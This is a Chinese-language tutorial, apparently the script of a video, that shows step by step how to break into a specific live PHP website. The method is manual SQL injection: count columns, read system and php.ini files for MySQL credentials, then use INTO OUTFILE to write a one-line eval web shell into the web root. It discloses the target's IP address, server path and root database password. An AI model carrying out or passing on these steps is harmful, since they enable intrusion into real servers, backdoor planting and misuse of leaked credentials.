PHP手工注入到into outfile导出webshell
欢迎各大站点转载此教程,除垃圾黑鹰以外!妈的,别他妈再把老子的教程变成你们的原创,更别拿老子
教程当你们的VIP教程买钱!
此教程没有任何含量,都是被人玩烂的东西,给小菜们做的!
大家好!小牛在红狼安全小组站发了个帖子就是写这个站的!但有很多新人似乎没怎么看明白。所以小黄
牛叫我做个动画给大家!欢迎大家访问 www.wolfexp.net
实际上本来今天想做个入侵SOHU分站的动画!但刚看了,漏洞修补了!所以就拿这个站做下演示吧!
哈哈,相关文章请到www.wolfexp.net 我的论坛ID yby123
好了,广告回来! 首先我们要找到注入点。再判断!这里大家看到了and 1=1 和 and 1=2 返回不一样
现在我们就要判断列数是多少!这里到10为正常 我们来看看20,出错,就说明列数小于20 再看看 11
11也出错,所以刚才返回是10 就是正确的列数了!记下 2 5 7 !
这 2 5 7 是我们一会要插入的地方! 4.0.17-nt 我们再看 organize
这里 4.0.17-nt 我们可以判断是win系统的服务器!那么我们知道PHP配置的时候 密码是存放在
c:/winnt/php.ini 那么我们只要读取密码就可以连接数据库了!好了我们现在字符替换下!不好意思!
的确是WIN系统的计算机啊!\WINNT="Microsoft Windows 2000 Server!那么我们现在要做的是读取
c:/winnt/php.ini 下的MYSQL连接密码以及帐户!不好意思,插错了!插到7下!那么我们现在就能读取
到 c:/winnt/php.ini 下的连接帐户信息!时间关系我就不找了!帐户root 密码 qazxcvbhu
IP: 210.76.60.134 稍微等下,有点卡!
网站路径: d:\usr\www\html\article4banner\
查找列数: order by 10
version() database() c:/boot.ini c:/winnt/php.ini
帐户root 密码 qazxcvbhu
use web;就是使用这个表
create table shell (name text);建立shell这个字段,类型是text 这里要注意如果发送失败,请把
shell改个名字
insert into shell (name) values ('<?php eval($_POST[cmd]);?>');写入一句话木马到数据库里!
select * into outfile 'd:\usr\www\html\article4banner\cnsapc.php' from shell;导出马
不好意思 这个YBY.PHP 我已经写过了,所以发送失败!这里换个!
OK 我们已经可以使用客户端去连接我们的一句话木马了!最后上大马!就这样再见
BY 丹 ciwnet.blog.sohu.com